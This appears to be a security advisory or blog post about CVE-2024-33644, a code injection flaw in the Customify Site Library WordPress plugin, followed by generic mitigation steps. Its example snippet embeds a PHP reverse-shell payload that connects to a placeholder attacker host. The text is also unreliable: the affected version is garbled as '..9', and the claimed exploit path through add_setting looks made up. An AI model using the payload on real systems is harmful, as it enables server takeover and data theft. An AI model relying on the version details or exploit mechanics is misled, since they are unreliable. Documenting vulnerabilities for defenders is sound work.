CVE-2024-33644 - Code Injection Vulnerability in WPCustomify's Customify Site Library

A critical vulnerability (CVE-2024-33644) has been discovered in WPCustomify's popular Customify Site Library WordPress plugin. This vulnerability allows unauthorized hackers to inject and execute malicious code into affected WordPress sites. The issue affects Customify Site Library: from not available (n/a) to version ..9. It is crucial for website admins to mitigate this threat and protect their websites.

Original References

- CVE-2024-33644 - National Vulnerability Database (NVD)
- WPCustomify - Customify Site Library Official Page

Vulnerability Details

This vulnerability is classified as an Improper Control of Generation of Code ('Code Injection') vulnerability. It allows hackers to manipulate and inject malicious code directly into the affected WordPress website via an unprotected input. Specifically, the vulnerability is present within the import functionality of the Customify Site Library plugin. The plugin does not validate or sanitize the input data, allowing for arbitrary code to be executed.

Example Code Snippet

Assume a WordPress website is running the vulnerable Customify Site Library plugin version ..9. The following code snippet demonstrates the vulnerability.

// Example malicious payload
$malicious_payload = "<?php exec('/bin/bash -c \"exec 5<>/dev/tcp/attacker_ip/attacker_port;cat <&5 | while read line; do \$line 2>&5 >&5; done\"); ?>";

// Assume $import_data variable contains the imported site data
$import_data = array("site_data" => $malicious_payload);

// The following line injects the malicious payload into the website
$wp_customize->add_setting( $import_data['site_data'] );

When the above code is executed on a vulnerable website, it enables remote command execution (RCE) on the targeted site, giving the attacker complete control over the victim's server and its stored data. This security issue could lead to severe implications, including data theft, disruption of website functionality, and even the further distribution of malware.

Impact and Risks

The vulnerable Customify Site Library plugin has been downloaded thousands of times, making a significant number of WordPress websites potentially susceptible to code injection attacks.

Solutions and Recommendations

It is important to address this vulnerability as soon as possible to avoid the adverse effects mentioned above. Here are the steps to follow to protect against the CVE-2024-33644 vulnerability:

1. Update your Customify Site Library plugin to the latest version to ensure its security features are up-to-date. If there is no patch available, consider deactivating and uninstalling the plugin until a fix is released.
2. Regularly back up your website's files and database. This allows you to restore your website if it is compromised.
3. Use strong, unique passwords for your WordPress accounts, and enable two-factor authentication (2FA) where possible.

Further Reading and Resources

- WordPress Security Best Practices
- Code Injection Overview - OWASP
- Guide to Understanding CVEs

Timeline

Published on: 05/17/2024 09:15:42 UTC
Last modified on: 05/17/2024 18:36:05 UTC